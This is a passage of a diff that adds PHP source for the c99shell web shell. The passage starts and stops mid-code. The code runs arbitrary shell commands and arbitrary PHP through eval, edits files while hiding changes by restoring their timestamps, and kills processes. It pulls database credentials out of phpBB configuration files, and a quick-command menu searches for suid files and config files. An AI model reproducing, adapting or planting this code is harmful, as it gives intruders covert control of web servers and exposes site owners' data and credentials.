myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b>"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} + +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("[hex]","info"), + array("[html]","html"), + array("[txt]","txt"), + array("[Code]","code"), + array("[Session]","phpsess"), + array("[exe]","exe"), + array("[SDB]","sdb"), + array("[gif]","img"), + array("[ini]","ini"), + array("[download]","download"), + array("[rtf]","notepad"), + array("[change]","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><br/> + <b> Quick Commands </b></div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="#"> [File Manipulation] + <OPTION VALUE=""> + <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system + <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files + <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory + <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files + <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory + <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions + <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files + <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory + <OPTION VALUE="find / -type f -name "config*">Find config* files + <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory + <OPTION 